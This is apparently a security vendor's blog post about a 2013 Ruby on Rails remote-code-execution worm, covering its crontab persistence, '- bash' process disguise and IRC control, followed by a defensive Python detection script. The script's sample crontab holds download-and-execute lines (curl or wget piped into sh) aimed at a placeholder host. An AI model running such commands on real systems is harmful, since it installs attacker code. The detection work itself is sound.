On the 28th of January 2013, Ruby on Rails announced the release of versions 3.0.20 and 2.3.16, which address an extremely critical security vulnerability in the framework itself. The vulnerability is a remote code execution flaw: when exploited, it allows an attacker to execute code on the remote web server.
In May 2013, automated bots started exploiting this known remote code execution vulnerability in the Ruby on Rails web framework. Even though it took almost four months for the vulnerability to surface in the wild, the attacks appear to be quite successful. The main reason they succeed is that web server administrators failed to upgrade their Ruby on Rails framework to the latest and most stable version.
Although most successful attacks were not documented, in one particular case a malicious hacker who exploited this Ruby on Rails vulnerability managed to withdraw funds from Vircurex, an exchange platform for buying, selling and trading Bitcoins and various other alt-chains. Vircurex posted on the Bitcoin forum to report the attack.
It has been reported that the Ruby on Rails remote code execution vulnerability is being exploited in the wild [*]. This particular worm works by adding a command to the crontab configuration file of the web server. When that command is executed, three files are downloaded and executed. Straight after, another two files are downloaded and executed, one of which is a C source code file that is compiled with the compromised web server's gcc compiler and then executed.
Once the fifth and last malicious file is downloaded and executed, the process runs under the name '- bash', so when the web server administrator checks the process list, the malicious process looks like a normal bash process and does not raise any suspicion.
While the malicious process is running, it connects to a pre-programmed IRC server, from which it can receive commands to download and execute files and to change the server it is connected to. Since there is no authentication control, anyone with basic IT skills can connect to the #rails IRC channel and hijack these infected bots.
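The two persistence tricks described above, a crontab entry that fetches and runs remote content and a process hiding under the name '- bash', are both things an administrator can check for on a host. The following Python script is an added example, not code from the original article or from Jeff Jarmoc's analysis. It runs two detection checks over constructed sample data: a crontab text with a placeholder download URL, and a small list of process records modelled on what `/proc/<pid>/cmdline` and `/proc/<pid>/exe` expose. The set of known shell binary paths is an assumption and should be adjusted per distribution.

```python
"""Added example (not from the original article): host-side checks for a
crontab entry that downloads and executes content, and for a process that
masquerades as a login shell under the name '- bash'.
Sample crontab lines and process records are constructed inline."""
import re
from dataclasses import dataclass

# Constructed sample crontab; the download URLs are placeholders, not real IoCs.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/bin/curl -s http://example.invalid/stage1 | /bin/sh
@reboot /usr/bin/wget -q -O /tmp/.x http://example.invalid/stage2 && sh /tmp/.x
"""

# A download tool on the same line as a shell sink (pipe or && into sh/bash,
# or a drop into /tmp) is the "fetch and execute" pattern the worm relies on.
FETCH_TOOLS = re.compile(r"\b(curl|wget|fetch)\b")
EXEC_SINKS = re.compile(r"\|\s*(\S*/)?(ba)?sh\b|&&\s*(\S*/)?(ba)?sh\b|/tmp/")


def suspicious_cron_lines(crontab_text):
    """Return (line_no, line) for entries that download and execute content."""
    hits = []
    for n, line in enumerate(crontab_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # blank lines and comments are never scheduled
        if FETCH_TOOLS.search(stripped) and EXEC_SINKS.search(stripped):
            hits.append((n, stripped))
    return hits


@dataclass
class Proc:
    pid: int
    argv0: str  # process name as shown by ps / read from /proc/<pid>/cmdline
    exe: str    # resolved target of /proc/<pid>/exe


# Paths a genuine shell binary may resolve to (assumption; adjust per distro).
KNOWN_SHELLS = {"/bin/bash", "/usr/bin/bash", "/bin/sh", "/usr/bin/sh", "/bin/dash"}

# Constructed process records for the demonstration.
SAMPLE_PROCS = [
    Proc(1234, "-bash", "/bin/bash"),       # real login shell: '-' glued to the name
    Proc(2345, "- bash", "/tmp/.x/httpd"),  # the '- bash' masquerade the post describes
    Proc(3456, "bash", "/usr/bin/bash"),    # ordinary interactive shell
    Proc(4567, "-bash", "/var/tmp/.s"),     # right name, but not a shell binary
]


def masquerading_shells(procs):
    """Flag pids whose shown name claims to be a shell but either uses the
    '- bash' spelling (a real login shell sets argv[0] to '-bash', with no
    space) or whose executable is not a known shell binary."""
    flagged = []
    for p in procs:
        name = p.argv0.lstrip("-").strip()
        if name not in ("bash", "sh", "dash"):
            continue  # only processes that present themselves as a shell
        spaced_dash = re.match(r"^-\s+\S", p.argv0) is not None
        if spaced_dash or p.exe not in KNOWN_SHELLS:
            flagged.append(p.pid)
    return flagged


if __name__ == "__main__":
    for n, line in suspicious_cron_lines(SAMPLE_CRONTAB):
        print(f"crontab line {n}: {line}")
    print("suspicious pids:", masquerading_shells(SAMPLE_PROCS))
```

On a live host the same functions can be fed the output of `crontab -l` for each user (plus `/etc/cron.d`) and the contents of `/proc`, which is why the process check compares the displayed name with the resolved executable rather than trusting the name alone: a process can pick any argv[0], but it cannot change what `/proc/<pid>/exe` points to.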
Although there are many procedures one can follow to secure web servers, or any other server, one of the most reliable is to always run the latest version of the software in use. The latest version is not just the most secure, but also the most stable and reliable.
Ensure that your web servers and web applications are secure by scanning them with the Netsparker web application security scanner. Apart from detecting vulnerabilities in web applications, Netsparker also detects vulnerabilities in web server software and frameworks, and it checks whether your Ruby on Rails installation is vulnerable to the above-mentioned Ruby on Rails remote code execution vulnerability.
Download Netsparker to check if your Ruby on Rails web framework installation is vulnerable.
A discussion between administrators whose web servers fell victim to this attack, covering what they have noticed so far on their web servers and in their web server log files, can be found here.
* A detailed analysis of the attack by security consultant Jeff Jarmoc can be found here.